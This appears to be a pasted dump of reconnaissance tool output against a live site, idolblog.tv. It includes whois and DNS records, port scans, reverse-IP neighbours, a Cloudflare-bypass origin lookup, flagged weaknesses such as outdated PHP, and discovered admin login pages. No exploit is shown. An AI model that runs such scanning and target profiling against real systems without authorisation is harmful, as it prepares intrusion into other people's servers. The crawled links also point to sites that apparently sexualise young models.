· 6 years ago · Jul 20, 2019, 11:45 AM
1#######################################################################################################################################
2=======================================================================================================================================
3Hostname idolblog.tv ISP IP Volume inc
4Continent Europe Flag
5NL
6Country Netherlands Country Code NL
7Region Unknown Local time 20 Jul 2019 08:45 CEST
8City Unknown Postal Code Unknown
9IP Address 89.248.174.131 Latitude 52.382
10 Longitude 4.9
11=============================================================================================================================
12#######################################################################################################################################
13> idolblog.tv
14Server: 185.93.180.131
15Address: 185.93.180.131#53
16
17Non-authoritative answer:
18Name: idolblog.tv
19Address: 89.248.174.131
20>
21#######################################################################################################################################
22 Domain Name: IDOLBLOG.TV
23 Registry Domain ID: 135359539_DOMAIN_TV-VRSN
24 Registrar WHOIS Server: whois.namesilo.com
25 Registrar URL: http://www.namesilo.com
26 Updated Date: 2019-05-04T12:44:16Z
27 Creation Date: 2018-05-09T09:39:05Z
28 Registry Expiry Date: 2020-05-09T09:39:05Z
29 Registrar: NameSilo, LLC
30 Registrar IANA ID: 1479
31 Registrar Abuse Contact Email: abuse@namesilo.com
32 Registrar Abuse Contact Phone: +1.4805240066
33 Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
34 Name Server: NS1.DNSOWL.COM
35 Name Server: NS2.DNSOWL.COM
36 Name Server: NS3.DNSOWL.COM
37 DNSSEC: unsigned
38 URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
39######################################################################################################################################
40Domain Name: idolblog.tv
41Registry Domain ID: 135359539_DOMAIN_TV-VRSN
42Registrar WHOIS Server: whois.namesilo.com
43Registrar URL: https://www.namesilo.com/
44Updated Date: 2019-07-17T07:00:00Z
45Creation Date: 2018-05-09T07:00:00Z
46Registrar Registration Expiration Date: 2020-05-09T07:00:00Z
47Registrar: NameSilo, LLC
48Registrar IANA ID: 1479
49Registrar Abuse Contact Email: abuse@namesilo.com
50Registrar Abuse Contact Phone: +1.4805240066
51Domain Status: clientTransferProhibited https://www.icann.org/epp#clientTransferProhibited
52Registry Registrant ID:
53Registrant Name: Domain Administrator
54Registrant Organization: See PrivacyGuardian.org
55Registrant Street: 1928 E. Highland Ave. Ste F104 PMB# 255
56Registrant City: Phoenix
57Registrant State/Province: AZ
58Registrant Postal Code: 85016
59Registrant Country: US
60Registrant Phone: +1.3478717726
61Registrant Phone Ext:
62Registrant Fax:
63Registrant Fax Ext:
64Registrant Email: pw-7debf3b6a7a3ee7cebe7a61b080f9a89@privacyguardian.org
65Registry Admin ID:
66Admin Name: Domain Administrator
67Admin Organization: See PrivacyGuardian.org
68Admin Street: 1928 E. Highland Ave. Ste F104 PMB# 255
69Admin City: Phoenix
70Admin State/Province: AZ
71Admin Postal Code: 85016
72Admin Country: US
73Admin Phone: +1.3478717726
74Admin Phone Ext:
75Admin Fax:
76Admin Fax Ext:
77Admin Email: pw-7debf3b6a7a3ee7cebe7a61b080f9a89@privacyguardian.org
78Registry Tech ID:
79Tech Name: Domain Administrator
80Tech Organization: See PrivacyGuardian.org
81Tech Street: 1928 E. Highland Ave. Ste F104 PMB# 255
82Tech City: Phoenix
83Tech State/Province: AZ
84Tech Postal Code: 85016
85Tech Country: US
86Tech Phone: +1.3478717726
87Tech Phone Ext:
88Tech Fax:
89Tech Fax Ext:
90Tech Email: pw-7debf3b6a7a3ee7cebe7a61b080f9a89@privacyguardian.org
91Name Server: NS1.DNSOWL.COM
92Name Server: NS2.DNSOWL.COM
93Name Server: NS3.DNSOWL.COM
94DNSSEC: unsigned#
95#################################################################################################################################
96[+] Target : idolblog.tv
97
98[+] IP Address : 89.248.174.131
99
100[+] Headers :
101
102[+] Date : Sat, 20 Jul 2019 07:06:27 GMT
103[+] Server : Apache/2
104[+] Upgrade : h2,h2c
105[+] Connection : Upgrade, Keep-Alive
106[+] X-Powered-By : PHP/5.6.35
107[+] Link : <http://idolblog.tv/wp-json/>; rel="https://api.w.org/"
108[+] Vary : Accept-Encoding,User-Agent
109[+] Content-Encoding : gzip
110[+] Content-Length : 12267
111[+] Keep-Alive : timeout=2, max=100
112[+] Content-Type : text/html; charset=UTF-8
113
114[+] SSL Certificate Information :
115
116[+] countryName : US
117[+] stateOrProvinceName : Someprovince
118[+] localityName : Sometown
119[+] organizationName : none
120[+] organizationalUnitName : none
121[+] commonName : localhost
122[+] emailAddress : webmaster@localhost
123[+] countryName : US
124[+] stateOrProvinceName : Someprovince
125[+] localityName : Sometown
126[+] organizationName : none
127[+] organizationalUnitName : none
128[+] commonName : localhost
129[+] emailAddress : webmaster@localhost
130[+] Version : 1
131[+] Serial Number : D5E166098E172E2B
132[+] Not Before : Apr 19 13:55:51 2018 GMT
133[+] Not After : Sep 3 13:55:51 2045 GMT
134
135[+] Whois Lookup :
136
137[+] NIR : None
138[+] ASN Registry : ripencc
139[+] ASN : 202425
140[+] ASN CIDR : 89.248.174.0/24
141[+] ASN Country Code : NL
142[+] ASN Date : 2006-07-11
143[+] ASN Description : INT-NETWORK, SC
144[+] cidr : 89.248.174.0/24
145[+] name : NET-2-174
146[+] handle : IVI24-RIPE
147[+] range : 89.248.174.0 - 89.248.174.255
148[+] description : IPV NETBLOCK
149[+] country : NL
150[+] state : None
151[+] city : None
152[+] address : Suite 9
153Victoria, Mahe
154Seychelles
155[+] postal_code : None
156[+] emails : None
157[+] created : 2019-02-03T20:55:51Z
158[+] updated : 2019-02-03T20:55:51Z
159
160[+] Crawling Target...
161
162[+] Looking for robots.txt........[ Found ]
163[+] Extracting robots Links.......[ 2 ]
164[+] Looking for sitemap.xml.......[ Not Found ]
165[+] Extracting CSS Links..........[ 4 ]
166[+] Extracting Javascript Links...[ 4 ]
167[+] Extracting Internal Links.....[ 180 ]
168[+] Extracting External Links.....[ 9 ]
169[+] Extracting Images.............[ 33 ]
170
171[+] Total Links Extracted : 232
172
173[+] Dumping Links in /opt/FinalRecon/dumps/idolblog.tv.dump
174[+] Completed!
175#######################################################################################################################################
176[+] Starting At 2019-07-20 03:06:39.138630
177[+] Collecting Information On: http://idolblog.tv/
178[#] Status: 200
179--------------------------------------------------
180[#] Web Server Detected: Apache/2
181[#] X-Powered-By: PHP/5.6.35
182[!] X-Frame-Options Headers not detect! target might be vulnerable Click Jacking
183- Date: Sat, 20 Jul 2019 07:06:37 GMT
184- Server: Apache/2
185- Upgrade: h2,h2c
186- Connection: Upgrade, Keep-Alive
187- X-Powered-By: PHP/5.6.35
188- Link: <http://idolblog.tv/wp-json/>; rel="https://api.w.org/"
189- Vary: Accept-Encoding,User-Agent
190- Content-Encoding: gzip
191- Content-Length: 12267
192- Keep-Alive: timeout=2, max=100
193- Content-Type: text/html; charset=UTF-8
194--------------------------------------------------
195[#] Finding Location..!
196[#] as: AS202425 IP Volume inc
197[#] city: Amsterdam
198[#] country: Netherlands
199[#] countryCode: NL
200[#] isp: IP Volume inc
201[#] lat: 52.3702
202[#] lon: 4.89517
203[#] org: Quasi Networks LTD.
204[#] query: 89.248.174.131
205[#] region: NH
206[#] regionName: North Holland
207[#] status: success
208[#] timezone: Europe/Amsterdam
209[#] zip: 1012
210--------------------------------------------------
211[x] Didn't Detect WAF Presence on: http://idolblog.tv/
212--------------------------------------------------
213[#] Starting Reverse DNS
214[!] Found 2 any Domain
215- idolblog.tv
216- modelblog.tv
217--------------------------------------------------
218[!] Scanning Open Port
219[#] 21/tcp open ftp
220[#] 22/tcp open ssh
221[#] 53/tcp open domain
222[#] 80/tcp open http
223[#] 110/tcp open pop3
224[#] 111/tcp open rpcbind
225[#] 143/tcp open imap
226[#] 443/tcp open https
227[#] 465/tcp open smtps
228[#] 587/tcp open submission
229[#] 993/tcp open imaps
230[#] 995/tcp open pop3s
231[#] 2222/tcp open EtherNetIP-1
232[#] 3306/tcp open mysql
233--------------------------------------------------
234[+] Collecting Information Disclosure!
235[#] Detecting sitemap.xml file
236[-] sitemap.xml file not Found!?
237[#] Detecting robots.txt file
238[!] robots.txt File Found: http://idolblog.tv//robots.txt
239[#] Detecting GNU Mailman
240[-] GNU Mailman App Not Detected!?
241--------------------------------------------------
242[+] Crawling Url Parameter On: http://idolblog.tv/
243--------------------------------------------------
244[#] Searching Html Form !
245[-] No Html Form Found!?
246--------------------------------------------------
247[!] Found 7 dom parameter
248[#] http://idolblog.tv/miho-kaneko-imouto-tv-sp1_kaneko_m05/#respond
249[#] http://idolblog.tv/miho-kaneko-imouto-tv-sp1_kaneko_m04/#comments
250[#] http://idolblog.tv/miho-kaneko-imouto-tv-sp1_kaneko_m03/#comments
251[#] http://idolblog.tv/miho-kaneko-imouto-tv-sp1_kaneko_m02/#comments
252[#] http://idolblog.tv/miho-kaneko-imouto-tv-sp1_kaneko_m01/#comments
253[#] http://idolblog.tv/miho-kaneko-imouto-tv-sc_kaneko_m08/#comments
254[#] http://idolblog.tv//#top
255--------------------------------------------------
256[!] 1 Internal Dynamic Parameter Discovered
257[+] http://idolblog.tv/xmlrpc.php?rsd
258--------------------------------------------------
259[!] 1 External Dynamic Parameter Discovered
260[#] https://theporndude.com/?utm_source=idolblog&utm_campaign=idolblog&utm_medium=referral
261--------------------------------------------------
262[!] 217 Internal links Discovered
480--------------------------------------------------
481[!] 9 External links Discovered
482[#] http://gmpg.org/xfn/11
483[#] http://www.teenmodels.club/
484[#] http://modelblog.tv
485[#] http://sexyblog.tv
486[#] http://eastblog.tv
487[#] http://teensblog.tv
488[#] http://latinblog.tv
489[#] http://amateurblog.tv
490[#] https://mylove.is/
491--------------------------------------------------
492[#] Mapping Subdomain..
493[!] Found 2 Subdomain
494- idolblog.tv
495- www.idolblog.tv
496--------------------------------------------------
497[!] Done At 2019-07-20 03:07:04.781316
498#######################################################################################################################################
499[i] Scanning Site: http://idolblog.tv
500
501
502
503B A S I C I N F O
504====================
505
506
507[+] Site Title: IdolBlog - Daily pictures of gravure idols from Japan.
508[+] IP address: 89.248.174.131
509[+] Web Server: Apache/2
510[+] CMS: WordPress
511[+] Cloudflare: Not Detected
512[+] Robots File: Found
513
514-------------[ contents ]----------------
515User-agent: *
516Disallow: /wp-admin/
517Allow: /wp-admin/admin-ajax.php
518
519-----------[end of contents]-------------
520
521
522
523W H O I S L O O K U P
524========================
525
526 Domain Name: IDOLBLOG.TV
527 Registry Domain ID: 135359539_DOMAIN_TV-VRSN
528 Registrar WHOIS Server: whois.namesilo.com
529 Registrar URL: http://www.namesilo.com
530 Updated Date: 2019-05-04T12:44:16Z
531 Creation Date: 2018-05-09T09:39:05Z
532 Registry Expiry Date: 2020-05-09T09:39:05Z
533 Registrar: NameSilo, LLC
534 Registrar IANA ID: 1479
535 Registrar Abuse Contact Email: abuse@namesilo.com
536 Registrar Abuse Contact Phone: +1.4805240066
537 Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
538 Name Server: NS1.DNSOWL.COM
539 Name Server: NS2.DNSOWL.COM
540 Name Server: NS3.DNSOWL.COM
541 DNSSEC: unsigned
542 URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
543>>> Last update of WHOIS database: 2019-07-20T07:07:50Z <<<
544
545For more information on Whois status codes, please visit https://icann.org/epp
546
547
548
549
550
551
552G E O I P L O O K U P
553=========================
554
555[i] IP Address: 89.248.174.131
556[i] Country: Netherlands
557[i] State:
558[i] City:
559[i] Latitude: 52.3824
560[i] Longitude: 4.8995
561
562
563
564
565H T T P H E A D E R S
566=======================
567
568
569[i] HTTP/1.0 200 OK
570[i] Date: Sat, 20 Jul 2019 07:07:53 GMT
571[i] Server: Apache/2
572[i] Upgrade: h2,h2c
573[i] Connection: Upgrade, close
574[i] X-Powered-By: PHP/5.6.35
575[i] Link: <http://idolblog.tv/wp-json/>; rel="https://api.w.org/"
576[i] Vary: Accept-Encoding,User-Agent
577[i] Content-Type: text/html; charset=UTF-8
578
579
580
581
582D N S L O O K U P
583===================
584
585idolblog.tv. 21599 IN NS ns1.dnsowl.com.
586idolblog.tv. 21599 IN NS ns2.dnsowl.com.
587idolblog.tv. 21599 IN NS ns3.dnsowl.com.
588idolblog.tv. 21599 IN SOA ns1.dnsowl.com. hostmaster.dnsowl.com. 1563605926 7200 1800 1209600 600
589idolblog.tv. 21599 IN A 89.248.174.131
590
591
592
593
594S U B N E T C A L C U L A T I O N
595====================================
596
597Address = 89.248.174.131
598Network = 89.248.174.131 / 32
599Netmask = 255.255.255.255
600Broadcast = not needed on Point-to-Point links
601Wildcard Mask = 0.0.0.0
602Hosts Bits = 0
603Max. Hosts = 1 (2^0 - 0)
604Host Range = { 89.248.174.131 - 89.248.174.131 }
605
606
607
608N M A P P O R T S C A N
609============================
610
611Starting Nmap 7.70 ( https://nmap.org ) at 2019-07-20 07:07 UTC
612Nmap scan report for idolblog.tv (89.248.174.131)
613Host is up (0.084s latency).
614
615PORT STATE SERVICE
61621/tcp open ftp
61722/tcp open ssh
61823/tcp closed telnet
61980/tcp open http
620110/tcp open pop3
621143/tcp open imap
622443/tcp open https
6233389/tcp closed ms-wbt-server
624
625Nmap done: 1 IP address (1 host up) scanned in 0.13 seconds
626
627
628
629S U B - D O M A I N F I N D E R
630==================================
631
632
633[i] Total Subdomains Found : 1
634
635[+] Subdomain: www.idolblog.tv
636[-] IP: 89.248.174.131
637
638#######################################################################################################################################
639Enter Address Website = idolblog.tv
640
641
642
643Reversing IP With HackTarget 'idolblog.tv'
644---------------------------------------------
645
646[+] amateurblog.to
647[+] babetopia.tv
648[+] boardgirls.to
649[+] easternblog.to
650[+] idolblog.tv
651[+] mail.amateurblog.to
652[+] mail.babetopia.tv
653[+] mail.boardgirls.to
654[+] mail.easternblog.to
655[+] mail.teensblog.tv
656[+] modelblog.tv
657[+] teensblog.tv
658[+] www.babetopia.tv
659[+] www.boardgirls.to
660[+] www.easternblog.to
661[+] www.idolblog.tv
662[+] www.modelblog.tv
663
664
665
666Reverse IP With YouGetSignal 'idolblog.tv'
667---------------------------------------------
668
669[*] IP: 89.248.174.131
670[*] Domain: idolblog.tv
671[*] Total Domains: 2
672
673[+] idolblog.tv
674[+] modelblog.tv
675
676
677
678Geo IP Lookup 'idolblog.tv'
679------------------------------
680
681[+] IP Address: 89.248.174.131
682[+] Country: Netherlands
683[+] State:
684[+] City:
685[+] Latitude: 52.3824
686[+] Longitude: 4.8995
687
688
689
690Whois 'idolblog.tv'
691----------------------
692
693[+] error check your api query
694
695
696
697Bypass Cloudflare 'idolblog.tv'
698----------------------------------
699
700[!] CloudFlare Bypass 89.248.174.131 | www.idolblog.tv
701
702
703
704
705DNS Lookup 'idolblog.tv'
706---------------------------
707
708[+] idolblog.tv. 21599 IN NS ns1.dnsowl.com.
709[+] idolblog.tv. 21599 IN NS ns2.dnsowl.com.
710[+] idolblog.tv. 21599 IN NS ns3.dnsowl.com.
711[+] idolblog.tv. 21599 IN SOA ns1.dnsowl.com. hostmaster.dnsowl.com. 1563605926 7200 1800 1209600 600
712[+] idolblog.tv. 21599 IN A 89.248.174.131
713
714
715
716Find Shared DNS 'idolblog.tv'
717--------------------------------
718
719[+] No DNS server records found for idolblog.tv
720
721
722
723Show HTTP Header 'idolblog.tv'
724---------------------------------
725
726[+] HTTP/1.1 200 OK
727[+] Date: Sat, 20 Jul 2019 07:04:58 GMT
728[+] Server: Apache/2
729[+] Upgrade: h2,h2c
730[+] Connection: Upgrade
731[+] X-Powered-By: PHP/5.6.35
732[+] Link: ; rel="https://api.w.org/"
733[+] Vary: User-Agent
734[+] Content-Type: text/html; charset=UTF-8
735[+]
736
737
738
739Port Scan 'idolblog.tv'
740--------------------------
741
742Starting Nmap 7.70 ( https://nmap.org ) at 2019-07-20 07:04 UTC
743Nmap scan report for idolblog.tv (89.248.174.131)
744Host is up (0.083s latency).
745
746PORT STATE SERVICE
74721/tcp open ftp
74822/tcp open ssh
74923/tcp closed telnet
75080/tcp open http
751110/tcp open pop3
752143/tcp open imap
753443/tcp open https
7543389/tcp closed ms-wbt-server
755
756Nmap done: 1 IP address (1 host up) scanned in 0.31 seconds
757
758
759
760
761Cms Scan 'idolblog.tv'
762-------------------------
763
764[+] Cms : WordPress
765[+] Web Servers : Apache
766[+] Programming Languages : PHP
767
768
769
770
771
772Robot.txt 'idolblog.tv'
773--------------------------
774
775User-agent: *
776Disallow: /wp-admin/
777Allow: /wp-admin/admin-ajax.php
778
779
780
781
782Traceroute 'idolblog.tv'
783---------------------------
784
785Start: 2019-07-20T07:05:06+0000
786HOST: web01 Loss% Snt Last Avg Best Wrst StDev
787 1.|-- 45.79.12.201 0.0% 3 1.5 1.1 0.9 1.5 0.3
788 2.|-- 45.79.12.4 0.0% 3 0.6 0.5 0.5 0.6 0.1
789 3.|-- dls-b22-link.telia.net 0.0% 3 0.9 5.1 0.9 13.6 7.3
790 4.|-- dls-b21-link.telia.net 0.0% 3 3.0 2.9 1.4 4.2 1.4
791 5.|-- dls-b23-link.telia.net 0.0% 3 1.4 1.4 1.4 1.5 0.1
792 6.|-- lag-14.ear5.Dallas1.Level3.net 0.0% 3 1.6 1.7 1.6 1.8 0.1
793 7.|-- ae-2-3207.edge6.Amsterdam1.Level3.net 0.0% 3 111.5 111.5 111.5 111.6 0.0
794 8.|-- unknown.Level3.net 0.0% 3 119.2 119.8 114.7 125.5 5.4
795 9.|-- 89.248.174.131 0.0% 3 118.4 118.5 118.4 118.7 0.1
796
797
798
799
800Ping 'idolblog.tv'
801---------------------
802
803error check your api query
804
805
806
807Page Admin Finder 'idolblog.tv'
808----------------------------------
809
810
811
812Avilable Links :
813
814Find Page >> http://idolblog.tv/admin/
815
816Find Page >> http://idolblog.tv/admin/index.php
817
818Find Page >> http://idolblog.tv/wp-login.php
819######################################################################################################################################
820Trying "idolblog.tv"
821;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 59537
822;; flags: qr rd ra; QUERY: 1, ANSWER: 5, AUTHORITY: 3, ADDITIONAL: 13
823
824;; QUESTION SECTION:
825;idolblog.tv. IN ANY
826
827;; ANSWER SECTION:
828idolblog.tv. 43200 IN A 89.248.174.131
829idolblog.tv. 43200 IN SOA ns1.dnsowl.com. hostmaster.dnsowl.com. 1563606532 7200 1800 1209600 600
830idolblog.tv. 43200 IN NS ns1.dnsowl.com.
831idolblog.tv. 43200 IN NS ns2.dnsowl.com.
832idolblog.tv. 43200 IN NS ns3.dnsowl.com.
833
834;; AUTHORITY SECTION:
835idolblog.tv. 43200 IN NS ns3.dnsowl.com.
836idolblog.tv. 43200 IN NS ns2.dnsowl.com.
837idolblog.tv. 43200 IN NS ns1.dnsowl.com.
838
839;; ADDITIONAL SECTION:
840ns1.dnsowl.com. 42918 IN A 104.207.141.138
841ns1.dnsowl.com. 42918 IN A 104.223.96.2
842ns1.dnsowl.com. 42918 IN A 168.235.75.84
843ns1.dnsowl.com. 42918 IN A 172.106.7.203
844ns1.dnsowl.com. 42918 IN A 185.34.216.159
845ns1.dnsowl.com. 42918 IN A 198.251.84.16
846ns1.dnsowl.com. 42918 IN A 204.188.203.153
847ns1.dnsowl.com. 42918 IN A 37.187.179.91
848ns1.dnsowl.com. 42918 IN A 45.63.5.234
849ns1.dnsowl.com. 42918 IN A 45.63.106.63
850ns1.dnsowl.com. 42918 IN A 64.32.22.100
851ns1.dnsowl.com. 42918 IN A 92.222.189.157
852ns1.dnsowl.com. 21981 IN AAAA 2001:19f0:5c01:bb0:5400:ff:fe1d:d1cc
853
854Received 418 bytes from 2001:18c0:121:6900:724f:b8ff:fefd:5b6a#53 in 78 ms
855#######################################################################################################################################
856; <<>> DiG 9.11.5-P4-5.1-Debian <<>> +trace idolblog.tv any
857;; global options: +cmd
858. 81455 IN NS l.root-servers.net.
859. 81455 IN NS d.root-servers.net.
860. 81455 IN NS h.root-servers.net.
861. 81455 IN NS j.root-servers.net.
862. 81455 IN NS m.root-servers.net.
863. 81455 IN NS a.root-servers.net.
864. 81455 IN NS i.root-servers.net.
865. 81455 IN NS b.root-servers.net.
866. 81455 IN NS f.root-servers.net.
867. 81455 IN NS k.root-servers.net.
868. 81455 IN NS e.root-servers.net.
869. 81455 IN NS c.root-servers.net.
870. 81455 IN NS g.root-servers.net.
871. 81455 IN RRSIG NS 8 0 518400 20190802050000 20190720040000 59944 . xIGI0GR44vw+NEuzO6GnyLATp8pXsEcrlyRkMSRegmDhRt5AhTz31YgI DJgEaTMK3eqRDerXC1jM1qmVhUGTv7eOIzTDqi0mW9AxdW36Is9V3rNf 4dUG6Jx8akmv2pLUh29Ga2Hq3pO5KtqF7SUUPLCULZEYxtGvej35YY2b ON2NbuDejNONwEDUtIZv2REd+PUvSIGIxjRnU1pYZ3/Q8jLBZDLJ/yF2 fk28kIntZk8jT4qG4ADrb6Wwb0jZj3xzUjAgGiwS88YyUIoOBFh216eY l+uFkWgqTIkr7iTcRwQS6aO+t4JOD5LBk9b/8cN/24EUUm67CTQ6vsAf yTM6aQ==
872;; Received 525 bytes from 185.93.180.131#53(185.93.180.131) in 232 ms
873
874tv. 172800 IN NS ac1.nstld.com.
875tv. 172800 IN NS ac3.nstld.com.
876tv. 172800 IN NS ac2.nstld.com.
877tv. 172800 IN NS ac4.nstld.com.
878tv. 86400 IN DS 44904 8 1 3E447F7145888B3137E9D83EEC9FB77671A8647D
879tv. 86400 IN DS 44904 8 2 1CFE1309925B78F42C8B4862A670B0BAB9FC142ED8B4D41E24C65FE6 A0D9DFB4
880tv. 86400 IN RRSIG DS 8 1 86400 20190802050000 20190720040000 59944 . W6MbiCO8zCEaaw9+S0S1XsZk1bDrYkNbluc2BpyXHo+ux330DEOAP+To hn+lmh9BfzVrPSy1nn4KB+4lQAUG8NyZNFzEqpEblmGCCWmJFomsDRvx v1kSztpxjorOs04fhZ29cOZvY0ibJ7uzQyZXpAmfQpb3OKhzZRUvj8SR vMjskflF91/0+3yasJwVtSPyiJVe9ZMonm5FfL0v0uKlEqtmHXlgxZmt /QL/5q+CLSvPneRB7Jjgve1HJDmevN5/XuGs6gTqYmZwQlXsKa1/kxrk AN1tM6pyBlGjtcUk+RtRV3VJvic2o1LoK/ddPjF4n1DpuwsB2ukWxVMW y5ijfQ==
881;; Received 696 bytes from 199.9.14.201#53(b.root-servers.net) in 362 ms
882
883idolblog.tv. 172800 IN NS ns3.dnsowl.com.
884idolblog.tv. 172800 IN NS ns2.dnsowl.com.
885idolblog.tv. 172800 IN NS ns1.dnsowl.com.
886E7Q4EUC85B62PB5AJFJ5J1ACUGC1ET4Q.tv. 86400 IN NSEC3 1 1 0 - E82QTN8CDGTCVRGO2NPET7KN70V9NDVJ NS SOA RRSIG DNSKEY NSEC3PARAM
887E7Q4EUC85B62PB5AJFJ5J1ACUGC1ET4Q.tv. 86400 IN RRSIG NSEC3 8 2 86400 20190726212012 20190719212012 35290 tv. jBwAlSotPABPJ1LSW7lCKlRWJLxxbv1KFyI2iCMHONDQ+Dw/CNhxtmgS 0+7HNmzvXXOw3C1EECvhLPeN/oRp7s8mzH02u7H4rY8LPpltVQtXe+1U sGn9h5yvtqTO71SLoEJCpQ2T0h0qF61cxLOXkmYPa37/il500GrAKslb xoToGjme817ZW/iVl5VYOMidMlN8OoSFnUJLTnZJUlaK0Q==
888KUBVI13DA8SQUH1TJ856CGUFKJ8175DL.tv. 86400 IN NSEC3 1 1 0 - KUCEBOI28GU3TOT749VPU3VFBS4556JM NS DS RRSIG
889KUBVI13DA8SQUH1TJ856CGUFKJ8175DL.tv. 86400 IN RRSIG NSEC3 8 2 86400 20190724024831 20190717024831 35290 tv. W2ePLRJL3nPf9PXqO9icfEi/hstdODaZmQYflNzqW8lmN6XeY2+9dbmy OqDjtRbIc2YEDvdtdabeuZaSMzS3jJ+GHQVuIpKN4I0JVILZih7+qWoH r0jOyDczlkr7DVjLJSWviSmF37+YQLLhPB6xXPLtlEZfazYelPrwZzyY Ho78x4p7SQw7ExRAoJgAf8UPcOgd2TTr+kEZ2RuaMCBYlA==
890;; Received 651 bytes from 192.42.175.30#53(ac3.nstld.com) in 226 ms
891
892;; expected opt record in response
893idolblog.tv. 172800 IN NS ns1.dnsowl.com.
894idolblog.tv. 172800 IN NS ns2.dnsowl.com.
895idolblog.tv. 172800 IN NS ns3.dnsowl.com.
896idolblog.tv. 172800 IN SOA ns1.dnsowl.com. hostmaster.dnsowl.com. 1563606532 7200 1800 1209600 600
897idolblog.tv. 172816 IN A 89.248.174.131
898;; Received 300 bytes from 37.187.179.91#53(ns1.dnsowl.com) in 242 ms
899#######################################################################################################################################
900[*] Performing General Enumeration of Domain: idolblog.tv
901[-] DNSSEC is not configured for idolblog.tv
902[*] SOA ns1.dnsowl.com 168.235.75.84
903[*] SOA ns1.dnsowl.com 104.207.141.138
904[*] SOA ns1.dnsowl.com 37.187.179.91
905[*] SOA ns1.dnsowl.com 64.32.22.100
906[*] SOA ns1.dnsowl.com 45.63.106.63
907[*] SOA ns1.dnsowl.com 92.222.189.157
908[*] SOA ns1.dnsowl.com 198.251.84.16
909[*] SOA ns1.dnsowl.com 185.34.216.159
910[*] SOA ns1.dnsowl.com 45.63.5.234
911[*] SOA ns1.dnsowl.com 204.188.203.153
912[*] SOA ns1.dnsowl.com 172.106.7.203
913[*] SOA ns1.dnsowl.com 104.223.96.2
914[*] NS ns1.dnsowl.com 168.235.75.84
915[*] NS ns1.dnsowl.com 104.207.141.138
916[*] NS ns1.dnsowl.com 37.187.179.91
917[*] NS ns1.dnsowl.com 64.32.22.100
918[*] NS ns1.dnsowl.com 45.63.106.63
919[*] NS ns1.dnsowl.com 92.222.189.157
920[*] NS ns1.dnsowl.com 198.251.84.16
921[*] NS ns1.dnsowl.com 185.34.216.159
922[*] NS ns1.dnsowl.com 45.63.5.234
923[*] NS ns1.dnsowl.com 204.188.203.153
924[*] NS ns1.dnsowl.com 172.106.7.203
925[*] NS ns1.dnsowl.com 104.223.96.2
926[*] NS ns1.dnsowl.com 2001:19f0:5c01:bb0:5400:ff:fe1d:d1cc
927[*] NS ns3.dnsowl.com 45.32.237.128
928[*] NS ns3.dnsowl.com 107.161.23.49
929[*] NS ns3.dnsowl.com 104.207.130.197
930[*] NS ns3.dnsowl.com 164.132.212.78
931[*] NS ns3.dnsowl.com 103.102.161.229
932[*] NS ns3.dnsowl.com 45.63.106.63
933[*] NS ns3.dnsowl.com 204.77.1.99
934[*] NS ns3.dnsowl.com 45.76.136.92
935[*] NS ns3.dnsowl.com 51.254.227.33
936[*] NS ns3.dnsowl.com 45.32.131.25
937[*] NS ns3.dnsowl.com 209.141.39.150
938[*] NS ns3.dnsowl.com 158.69.33.230
939[*] NS ns3.dnsowl.com 2001:19f0:9002:12b4:5400:ff:fe1d:d25a
940[*] NS ns2.dnsowl.com 45.35.72.169
941[*] NS ns2.dnsowl.com 198.251.81.68
942[*] NS ns2.dnsowl.com 168.235.75.52
943[*] NS ns2.dnsowl.com 5.196.27.156
944[*] NS ns2.dnsowl.com 96.47.239.164
945[*] NS ns2.dnsowl.com 142.4.203.33
946[*] NS ns2.dnsowl.com 45.63.62.227
947[*] NS ns2.dnsowl.com 45.32.237.128
948[*] NS ns2.dnsowl.com 167.114.213.239
949[*] NS ns2.dnsowl.com 45.58.190.81
950[*] NS ns2.dnsowl.com 104.207.141.138
951[*] NS ns2.dnsowl.com 107.150.29.109
952[*] NS ns2.dnsowl.com 2001:19f0:5001:eed:5400:ff:fe1d:d24f
953[-] Could not Resolve MX Records for idolblog.tv
954[*] A idolblog.tv 89.248.174.131
955[*] Enumerating SRV Records
956[-] No SRV Records Found for idolblog.tv
957[+] 0 Records Found
958#######################################################################################################################################
959[*] Processing domain idolblog.tv
960[*] Using system resolvers ['185.93.180.131', '194.187.251.67', '38.132.106.139', '192.168.0.1', '2001:18c0:121:6900:724f:b8ff:fefd:5b6a']
961[+] Getting nameservers
962168.235.75.84 - ns1.dnsowl.com
963104.207.141.138 - ns1.dnsowl.com
96437.187.179.91 - ns1.dnsowl.com
96564.32.22.100 - ns1.dnsowl.com
96645.63.106.63 - ns1.dnsowl.com
96792.222.189.157 - ns1.dnsowl.com
968198.251.84.16 - ns1.dnsowl.com
969185.34.216.159 - ns1.dnsowl.com
97045.63.5.234 - ns1.dnsowl.com
971204.188.203.153 - ns1.dnsowl.com
972172.106.7.203 - ns1.dnsowl.com
973104.223.96.2 - ns1.dnsowl.com
97445.32.237.128 - ns3.dnsowl.com
975107.161.23.49 - ns3.dnsowl.com
976104.207.130.197 - ns3.dnsowl.com
977164.132.212.78 - ns3.dnsowl.com
978103.102.161.229 - ns3.dnsowl.com
97945.63.106.63 - ns3.dnsowl.com
980204.77.1.99 - ns3.dnsowl.com
98145.76.136.92 - ns3.dnsowl.com
98251.254.227.33 - ns3.dnsowl.com
98345.32.131.25 - ns3.dnsowl.com
984209.141.39.150 - ns3.dnsowl.com
985158.69.33.230 - ns3.dnsowl.com
98645.35.72.169 - ns2.dnsowl.com
987198.251.81.68 - ns2.dnsowl.com
988168.235.75.52 - ns2.dnsowl.com
9895.196.27.156 - ns2.dnsowl.com
99096.47.239.164 - ns2.dnsowl.com
991142.4.203.33 - ns2.dnsowl.com
99245.63.62.227 - ns2.dnsowl.com
99345.32.237.128 - ns2.dnsowl.com
994167.114.213.239 - ns2.dnsowl.com
99545.58.190.81 - ns2.dnsowl.com
996104.207.141.138 - ns2.dnsowl.com
997107.150.29.109 - ns2.dnsowl.com
998[-] Zone transfer failed
999
1000[*] Scanning idolblog.tv for A records
100189.248.174.131 - idolblog.tv
100289.248.174.131 - www.idolblog.tv
1003#######################################################################################################################################
1004WhatWeb report for http://idolblog.tv
1005Status : 200 OK
1006Title : IdolBlog - Daily pictures of gravure idols from Japan.
1007IP : 89.248.174.131
1008Country : NETHERLANDS, NL
1009
